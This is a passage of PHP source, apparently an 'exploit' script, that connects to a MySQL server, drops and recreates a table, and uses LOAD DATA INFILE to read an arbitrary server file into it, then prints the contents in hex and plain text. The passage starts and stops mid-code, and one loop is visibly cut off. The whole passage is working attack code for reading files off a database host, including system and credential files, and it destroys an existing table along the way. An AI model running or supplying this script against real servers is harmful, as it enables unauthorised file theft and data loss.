connecting.. "; $link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect: ".mysql_error()."\n"); echo "OK\n-> trying to select `mysql` db.. "; $rez=mysql_select_db("mysql"); if (!$rez) { echo "OK, \$user $user has no access to `mysql`, proceeding..\n"; } else { echo "\$user $user has access to `mysql`!\n"; # so why do you need this "exploit"? die(11); } echo "-> selecting db.. "; mysql_select_db($db) or die ("cannot select db: ".mysql_error()."\n"); echo "OK\n-> trying to drop old table.. "; $rez=mysql_query("DROP TABLE file;"); if (!$rez) { echo "cannot drop table: ".mysql_error()."\n"; } echo "OK\n-> creating table.. "; mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die ("cannot create table: ".mysql_error()."\n"); echo "OK\n-> reading file $file.. "; mysql_query('LOAD DATA INFILE "'.$file.'" INTO TABLE file LINES TERMINATED BY "" (`text`);') or die ("cannot load data: ".mysql_error()."\n"); $rez=mysql_query("SELECT * FROM file;"); if (!$rez) { echo "fail. no FILE permission?\n"; } else { for ($i=0;$i result:\n"; $hex = ""; $plain = ""; for ($i=0; $i